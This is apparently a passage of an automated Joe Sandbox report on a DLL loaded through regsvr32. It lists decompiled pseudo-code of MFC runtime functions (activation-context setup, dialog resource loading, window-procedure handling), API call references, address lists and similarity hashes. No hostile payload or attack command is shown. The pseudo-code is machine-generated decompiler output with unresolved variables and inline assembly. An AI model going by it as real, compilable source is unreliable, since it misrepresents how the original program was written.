                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 10023B9B
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10023BA6
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023BAF
                                                                                                                • SuspendThread.KERNEL32(?), ref: 10023BBA
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10023BCA
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023BD3
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023BF5
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • SetEvent.KERNEL32(00000004), ref: 10023BDD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3256170895-0
                                                                                                                • Opcode ID: 6fe4a5408cef7c50b8e17eb3e6281a495fe489ddceb07d2ffebb2e367f73edd5
                                                                                                                • Instruction ID: bcf15dfb87e31a0624e6b54508bba83dfbd3c581a66068fe1aeb0b250c0b91f9
                                                                                                                • Opcode Fuzzy Hash: 6fe4a5408cef7c50b8e17eb3e6281a495fe489ddceb07d2ffebb2e367f73edd5
                                                                                                                • Instruction Fuzzy Hash: 6F312C72C00209BFDB01EFA4EC85D9EBBB9FF08354F50866AF615A2560DB719A51CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100252AB(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				_Unknown_base(*)()* _t9;
                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                				void* _t16;
                                                                                                                				intOrPtr* _t18;
                                                                                                                				char _t19;
                                                                                                                				intOrPtr _t21;
                                                                                                                				_Unknown_base(*)()* _t22;
                                                                                                                				_Unknown_base(*)()* _t23;
                                                                                                                
                                                                                                                				_t16 = __esi;
                                                                                                                				_t12 = __ecx;
                                                                                                                				_t18 = __ecx;
                                                                                                                				 *__ecx = _a4;
                                                                                                                				_a4 = 0;
                                                                                                                				_t19 =  *0x10070c48; // 0x0
                                                                                                                				if(_t19 == 0) {
                                                                                                                					_t15 = GetModuleHandleA("KERNEL32");
                                                                                                                					_t20 = _t15;
                                                                                                                					if(_t15 == 0) {
                                                                                                                						L2:
                                                                                                                						E1001729E(0, _t12, _t15, _t16, _t20);
                                                                                                                					}
                                                                                                                					 *0x10070c38 = GetProcAddress(_t15, "CreateActCtxA");
                                                                                                                					 *0x10070c3c = GetProcAddress(_t15, "ReleaseActCtx");
                                                                                                                					 *0x10070c40 = GetProcAddress(_t15, "ActivateActCtx");
                                                                                                                					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                                                                                					_t21 =  *0x10070c38; // 0x0
                                                                                                                					 *0x10070c44 = _t9;
                                                                                                                					_t16 = _t16;
                                                                                                                					if(_t21 == 0) {
                                                                                                                						__eflags =  *0x10070c3c; // 0x0
                                                                                                                						if(__eflags != 0) {
                                                                                                                							goto L2;
                                                                                                                						} else {
                                                                                                                							__eflags =  *0x10070c40; // 0x0
                                                                                                                							if(__eflags != 0) {
                                                                                                                								goto L2;
                                                                                                                							} else {
                                                                                                                								__eflags = _t9;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L2;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t22 =  *0x10070c3c; // 0x0
                                                                                                                						if(_t22 == 0) {
                                                                                                                							goto L2;
                                                                                                                						} else {
                                                                                                                							_t23 =  *0x10070c40; // 0x0
                                                                                                                							if(_t23 == 0) {
                                                                                                                								goto L2;
                                                                                                                							} else {
                                                                                                                								_t20 = _t9;
                                                                                                                								if(_t9 == 0) {
                                                                                                                									goto L2;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *0x10070c48 = 1;
                                                                                                                				}
                                                                                                                				return _t18;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10025CD9,000000FF), ref: 100252CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 100252EB
                                                                                                                • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 100252F8
                                                                                                                • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10025305
                                                                                                                • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10025312
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                • API String ID: 667068680-3617302793
                                                                                                                • Opcode ID: fd2fed17c0c0498abed4b040eb62f5add90f349c94c9f0d03b817c527ce8cf40
                                                                                                                • Instruction ID: a62262e3b0bffdb13dbd19011fdd4316014651cabadfc1ee22f31bb77626f904
                                                                                                                • Opcode Fuzzy Hash: fd2fed17c0c0498abed4b040eb62f5add90f349c94c9f0d03b817c527ce8cf40
                                                                                                                • Instruction Fuzzy Hash: 5211A0758013A9EBE711DF69ACD4449BEE4E706152760873FF686A3010EB795888CF15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10021343(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t54;
                                                                                                                				void* _t58;
                                                                                                                				signed int _t59;
                                                                                                                				signed int _t63;
                                                                                                                				signed short _t71;
                                                                                                                				signed int _t84;
                                                                                                                				void* _t94;
                                                                                                                				struct HINSTANCE__* _t96;
                                                                                                                				signed int _t97;
                                                                                                                				void* _t98;
                                                                                                                				signed int _t100;
                                                                                                                				void* _t101;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t102 = __eflags;
                                                                                                                				_t94 = __edx;
                                                                                                                				_push(0x24);
                                                                                                                				E1003D219(E1005356D, __ebx, __edi, __esi);
                                                                                                                				_t100 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                                                                                				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                                                                                				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                                                                                				_t54 = E10023187(__ebx, __edi, __ecx, _t102);
                                                                                                                				_t96 =  *(_t54 + 0xc);
                                                                                                                				_t84 = 0;
                                                                                                                				_t103 =  *(_t100 + 0x58);
                                                                                                                				if( *(_t100 + 0x58) != 0) {
                                                                                                                					_t96 =  *(E10023187(0, _t96, _t100, _t103) + 0xc);
                                                                                                                					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                                                                                					 *(_t101 - 0x18) = _t54;
                                                                                                                				}
                                                                                                                				if( *(_t101 - 0x18) != _t84) {
                                                                                                                					_t54 = LockResource( *(_t101 - 0x18));
                                                                                                                					 *(_t101 - 0x1c) = _t54;
                                                                                                                				}
                                                                                                                				if( *(_t101 - 0x1c) != _t84) {
                                                                                                                					_t86 = _t100;
                                                                                                                					 *(_t101 - 0x14) = E10020E9D(_t84, _t100, __eflags);
                                                                                                                					E10019CBE(_t84, _t96, __eflags);
                                                                                                                					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                                                                                					__eflags =  *(_t101 - 0x14) - _t84;
                                                                                                                					 *(_t101 - 0x2c) = _t84;
                                                                                                                					 *(_t101 - 0x24) = _t84;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                                                                                							if(__eflags != 0) {
                                                                                                                								EnableWindow( *(_t101 - 0x14), 0);
                                                                                                                								 *(_t101 - 0x2c) = 1;
                                                                                                                								_t84 = E10004700();
                                                                                                                								__eflags = _t84;
                                                                                                                								 *(_t101 - 0x24) = _t84;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t86 = _t84;
                                                                                                                									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_t86 = _t84;
                                                                                                                										__eflags = E1001D37F(_t84);
                                                                                                                										if(__eflags != 0) {
                                                                                                                											_t86 = _t84;
                                                                                                                											E1001D39A(_t84, 0);
                                                                                                                											 *(_t101 - 0x28) = 1;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                                					E1001B7F6(_t96, __eflags, _t100);
                                                                                                                					_t58 = E10019C16(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                                                                                					_push(_t96);
                                                                                                                					_push(_t58);
                                                                                                                					_push( *(_t101 - 0x1c));
                                                                                                                					_t59 = E10021153(_t84, _t100, _t94, _t96, _t100, __eflags);
                                                                                                                					_t97 = 0;
                                                                                                                					__eflags = _t59;
                                                                                                                					if(_t59 != 0) {
                                                                                                                						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                                                                                						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                                                                                							_t98 = 4;
                                                                                                                							_t71 = E1001D23C(_t100);
                                                                                                                							__eflags = _t71 & 0x00000100;
                                                                                                                							if((_t71 & 0x00000100) != 0) {
                                                                                                                								_t98 = 5;
                                                                                                                							}
                                                                                                                							E100197B9(_t100, _t98);
                                                                                                                							_t97 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						}
                                                                                                                						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                                                                                						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                                                                                							E1001D569(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t101 - 0x28) - _t97;
                                                                                                                					if( *(_t101 - 0x28) != _t97) {
                                                                                                                						E1001D39A(_t84, 1);
                                                                                                                					}
                                                                                                                					__eflags =  *(_t101 - 0x2c) - _t97;
                                                                                                                					if( *(_t101 - 0x2c) != _t97) {
                                                                                                                						EnableWindow( *(_t101 - 0x14), 1);
                                                                                                                					}
                                                                                                                					__eflags =  *(_t101 - 0x14) - _t97;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                                                                                						if(__eflags == 0) {
                                                                                                                							SetActiveWindow( *(_t101 - 0x14));
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t100 + 0x60))();
                                                                                                                					E10020ED7(_t84, _t100, _t97, _t100, __eflags);
                                                                                                                					__eflags =  *(_t100 + 0x58) - _t97;
                                                                                                                					if( *(_t100 + 0x58) != _t97) {
                                                                                                                						FreeResource( *(_t101 - 0x18));
                                                                                                                					}
                                                                                                                					_t63 =  *(_t100 + 0x44);
                                                                                                                					goto L31;
                                                                                                                				} else {
                                                                                                                					_t63 = _t54 | 0xffffffff;
                                                                                                                					L31:
                                                                                                                					return E1003D2BE(_t63);
                                                                                                                				}
                                                                                                                			}
















                                                                                                                0x100213ec
                                                                                                                0x100213f8
                                                                                                                0x100213fa
                                                                                                                0x100213fc
                                                                                                                0x100213ff
                                                                                                                0x10021403
                                                                                                                0x1002140b
                                                                                                                0x1002140d
                                                                                                                0x1002140f
                                                                                                                0x10021416
                                                                                                                0x10021418
                                                                                                                0x1002141c
                                                                                                                0x1002141e
                                                                                                                0x10021423
                                                                                                                0x10021423
                                                                                                                0x10021418
                                                                                                                0x1002140d
                                                                                                                0x100213ff
                                                                                                                0x100213df
                                                                                                                0x100213d2
                                                                                                                0x1002142a
                                                                                                                0x1002142f
                                                                                                                0x10021437
                                                                                                                0x1002143c
                                                                                                                0x1002143d
                                                                                                                0x1002143e
                                                                                                                0x10021443
                                                                                                                0x10021448
                                                                                                                0x1002144a
                                                                                                                0x1002144c
                                                                                                                0x1002144e
                                                                                                                0x10021452
                                                                                                                0x10021456
                                                                                                                0x10021459
                                                                                                                0x1002145e
                                                                                                                0x10021462
                                                                                                                0x10021466
                                                                                                                0x10021466
                                                                                                                0x1002146a
                                                                                                                0x1002146f
                                                                                                                0x1002146f
                                                                                                                0x1002146f
                                                                                                                0x10021471
                                                                                                                0x10021474
                                                                                                                0x10021482
                                                                                                                0x10021482
                                                                                                                0x10021474
                                                                                                                0x10021487
                                                                                                                0x100214aa
                                                                                                                0x100214ad
                                                                                                                0x100214b3
                                                                                                                0x100214b3
                                                                                                                0x100214b8
                                                                                                                0x100214bb
                                                                                                                0x100214c2
                                                                                                                0x100214c2
                                                                                                                0x100214c8
                                                                                                                0x100214cb
                                                                                                                0x100214d3
                                                                                                                0x100214d6
                                                                                                                0x100214db
                                                                                                                0x100214db
                                                                                                                0x100214d6
                                                                                                                0x100214e5
                                                                                                                0x100214ea
                                                                                                                0x100214ef
                                                                                                                0x100214f2
                                                                                                                0x100214f7
                                                                                                                0x100214f7
                                                                                                                0x100214fd
                                                                                                                0x00000000
                                                                                                                0x100213a4
                                                                                                                0x100213a4
                                                                                                                0x10021500
                                                                                                                0x10021505
                                                                                                                0x10021505

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002134A
                                                                                                                • FindResourceA.KERNEL32 ref: 1002137D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 10021385
                                                                                                                • LockResource.KERNEL32(?,00000024,10009C92), ref: 10021396
                                                                                                                • GetDesktopWindow.USER32 ref: 100213C9
                                                                                                                • IsWindowEnabled.USER32(?), ref: 100213D7
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 100213E6
                                                                                                                  • Part of subcall function 1001D37F: IsWindowEnabled.USER32(?), ref: 1001D388
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 100214C2
                                                                                                                • GetActiveWindow.USER32 ref: 100214CD
                                                                                                                • SetActiveWindow.USER32(?), ref: 100214DB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10009C92), ref: 100214F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1509511306-0
                                                                                                                • Opcode ID: 337ad1a63b2d6bde616ace9a407e3d7c868c2b696f3812ada9cc6af12ad298e8
                                                                                                                • Instruction ID: 35651345c3de5f526abb446b9f3eb7b658c9eb69d0e543655bbc2de7d47d2b60
                                                                                                                • Opcode Fuzzy Hash: 337ad1a63b2d6bde616ace9a407e3d7c868c2b696f3812ada9cc6af12ad298e8
                                                                                                                • Instruction Fuzzy Hash: ED51BC38A00605CBDF11EFA0AC85AAEBBF1FF58741F60442AF446A6291DB709A81CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E1003840A(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed int* _a8, signed int _a12) {
                                                                                                                				struct HINSTANCE__* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t24;
                                                                                                                				struct HINSTANCE__* _t28;
                                                                                                                				long _t32;
                                                                                                                				void* _t33;
                                                                                                                				_Unknown_base(*)()* _t38;
                                                                                                                				struct HRSRC__* _t39;
                                                                                                                				void* _t40;
                                                                                                                				signed short _t42;
                                                                                                                				void* _t50;
                                                                                                                				void* _t51;
                                                                                                                				void* _t61;
                                                                                                                				void* _t66;
                                                                                                                				void* _t67;
                                                                                                                				void* _t69;
                                                                                                                				signed int _t72;
                                                                                                                				void* _t76;
                                                                                                                				void* _t77;
                                                                                                                
                                                                                                                				_t69 = __esi;
                                                                                                                				_t67 = __edi;
                                                                                                                				_t66 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(_t50);
                                                                                                                				_push(E100383EC);
                                                                                                                				_t51 = E1002D1BB(_t50, 0x10070f20, __edi, __esi, __eflags);
                                                                                                                				_t80 = _t51;
                                                                                                                				if(_t51 == 0) {
                                                                                                                					E1001729E(_t51, 0x10070f20, __edi, __esi, _t80);
                                                                                                                				}
                                                                                                                				_t81 =  *(_t51 + 8);
                                                                                                                				if( *(_t51 + 8) != 0) {
                                                                                                                					L15:
                                                                                                                					E10002070(_t66, _t67,  *(_t51 + 4));
                                                                                                                					_t24 =  *(_t51 + 8) & 0x0000ffff;
                                                                                                                					 *_a8 = _t24;
                                                                                                                					return 0 | _t24 != 0x0000ffff;
                                                                                                                				} else {
                                                                                                                					_push(_t69);
                                                                                                                					_t28 = E1000BE70( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t51, _t67, _t69, _t81) + 0x78)))));
                                                                                                                					_v8 = _t28;
                                                                                                                					if(_t28 == 0) {
                                                                                                                						L12:
                                                                                                                						_t70 = _a4;
                                                                                                                						_t32 = E10001710( *((intOrPtr*)( *_a4 - 0xc)) + 1, 1);
                                                                                                                						_pop(_t61);
                                                                                                                						_t33 = GlobalAlloc(0x40, _t32);
                                                                                                                						_t89 = _t33;
                                                                                                                						 *(_t51 + 4) = _t33;
                                                                                                                						if(_t33 == 0) {
                                                                                                                							_t33 = E1001726A(_t51, _t61, _t67, _t70, _t89);
                                                                                                                						}
                                                                                                                						E100202D5(_t51, _t66, _t67, _t70, _t76, _t33,  *((intOrPtr*)( *_t70 - 0xc)) + 1,  *_t70);
                                                                                                                						 *(_t51 + 8) =  *_a8;
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					_push(_t67);
                                                                                                                					_t38 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "GetUserDefaultUILanguage");
                                                                                                                					_t72 = _a12;
                                                                                                                					if(_t38 == 0) {
                                                                                                                						L8:
                                                                                                                						asm("sbb esi, esi");
                                                                                                                						_t39 = FindResourceA(_v8, ( ~_t72 & 0x0000000e) + 0x3ee, 5);
                                                                                                                						if(_t39 == 0) {
                                                                                                                							L11:
                                                                                                                							_pop(_t67);
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						L9:
                                                                                                                						_t40 = LoadResource(_v8, _t39);
                                                                                                                						_t88 = _t40;
                                                                                                                						if(_t40 != 0) {
                                                                                                                							E100353FB(_t88, _t40, _a4, _a8);
                                                                                                                							_t77 = _t77 + 0xc;
                                                                                                                						}
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t42 =  *_t38();
                                                                                                                					_t84 = (_t42 & 0x000003ff) - 0x11;
                                                                                                                					if((_t42 & 0x000003ff) == 0x11 && E1003835D(_t51, "MS UI Gothic", _t66, _t84) != 0) {
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						_t39 = FindResourceExA(_v8, 5, ( ~_t72 & 0x0000000e) + 0x3ee, 0xfc11);
                                                                                                                						if(_t39 != 0) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                			}























                                                                                                                0x00000000
                                                                                                                0x10038527
                                                                                                                0x1003844f
                                                                                                                0x10038461
                                                                                                                0x10038469
                                                                                                                0x10038471
                                                                                                                0x100384ad
                                                                                                                0x100384af
                                                                                                                0x100384bc
                                                                                                                0x100384c4
                                                                                                                0x100384e3
                                                                                                                0x100384e3
                                                                                                                0x00000000
                                                                                                                0x100384e3
                                                                                                                0x100384c6
                                                                                                                0x100384ca
                                                                                                                0x100384d0
                                                                                                                0x100384d2
                                                                                                                0x100384db
                                                                                                                0x100384e0
                                                                                                                0x100384e0
                                                                                                                0x00000000
                                                                                                                0x100384d2
                                                                                                                0x10038473
                                                                                                                0x10038479
                                                                                                                0x1003847d
                                                                                                                0x10038491
                                                                                                                0x100384a3
                                                                                                                0x100384ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100384ab
                                                                                                                0x00000000
                                                                                                                0x1003847d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002D1BB: __EH_prolog3_catch.LIBCMT ref: 1002D1C2
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00000000,?,100383EC,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 10038455
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 10038461
                                                                                                                • FindResourceExA.KERNEL32(00000000,00000005,?,0000FC11), ref: 100384A3
                                                                                                                • FindResourceA.KERNEL32 ref: 100384BC
                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 100384CA
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,100383EC,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 100384FA
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Find$AddressAllocException@8GlobalH_prolog3H_prolog3_catchHandleLoadModuleProcThrow
                                                                                                                • String ID: GetUserDefaultUILanguage$KERNEL32.DLL$MS UI Gothic
                                                                                                                • API String ID: 202444263-1344381877
                                                                                                                • Opcode ID: b4e2ec52a72eaebb105ac3bd8e120d6ee241f876f7a443ae72377c137d8db2f1
                                                                                                                • Instruction ID: 67b46749c551dcd9ece66a837ccf3ef5942c46c94da6440fc3541c2bdf937fd4
                                                                                                                • Opcode Fuzzy Hash: b4e2ec52a72eaebb105ac3bd8e120d6ee241f876f7a443ae72377c137d8db2f1
                                                                                                                • Instruction Fuzzy Hash: DB31E579A00311AFEB11DF60DC86EAA37A8EF44751F058069FC09CF291EA34EE81C760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1001B45F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				_Unknown_base(*)()* _t31;
                                                                                                                				void* _t33;
                                                                                                                				void* _t34;
                                                                                                                				void* _t40;
                                                                                                                				void* _t43;
                                                                                                                				void* _t60;
                                                                                                                				void* _t64;
                                                                                                                				struct HWND__* _t66;
                                                                                                                				CHAR* _t68;
                                                                                                                				void* _t71;
                                                                                                                
                                                                                                                				_t64 = __edx;
                                                                                                                				_t60 = __ecx;
                                                                                                                				_push(0x40);
                                                                                                                				E1003D219(E10052FB4, __ebx, __edi, __esi);
                                                                                                                				_t66 =  *(_t71 + 8);
                                                                                                                				_t68 = "AfxOldWndProc423";
                                                                                                                				_t31 = GetPropA(_t66, _t68);
                                                                                                                				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                                                                                				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                                				 *(_t71 - 0x18) = _t31;
                                                                                                                				_t58 = 1;
                                                                                                                				_t33 =  *(_t71 + 0xc) - 6;
                                                                                                                				if(_t33 == 0) {
                                                                                                                					_t34 = E10019C16(1, _t60, _t71,  *(_t71 + 0x14));
                                                                                                                					E1001B373(_t60, E10019C16(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					_t40 = _t33 - 0x1a;
                                                                                                                					if(_t40 == 0) {
                                                                                                                						_t58 = 0 | E1001B3E9(1, _t66, E10019C16(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                                                                                						L9:
                                                                                                                						if(_t58 != 0) {
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t43 = _t40 - 0x62;
                                                                                                                						if(_t43 == 0) {
                                                                                                                							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                                                                                							RemovePropA(_t66, _t68);
                                                                                                                							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                                                                                							goto L10;
                                                                                                                						} else {
                                                                                                                							if(_t43 != 0x8e) {
                                                                                                                								L10:
                                                                                                                								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                							} else {
                                                                                                                								E100188D8(E10019C16(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                                                                                								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                								E1001A22F(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1003D2BE( *(_t71 - 0x14));
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001B466
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001B475
                                                                                                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001B4CF
                                                                                                                  • Part of subcall function 1001A22F: GetWindowRect.USER32 ref: 1001A257
                                                                                                                  • Part of subcall function 1001A22F: GetWindow.USER32(?,00000004), ref: 1001A274
                                                                                                                • SetWindowLongA.USER32 ref: 1001B4F6
                                                                                                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001B4FE
                                                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001B505
                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001B50C
                                                                                                                  • Part of subcall function 100188D8: GetWindowRect.USER32 ref: 100188E4
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001B560
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
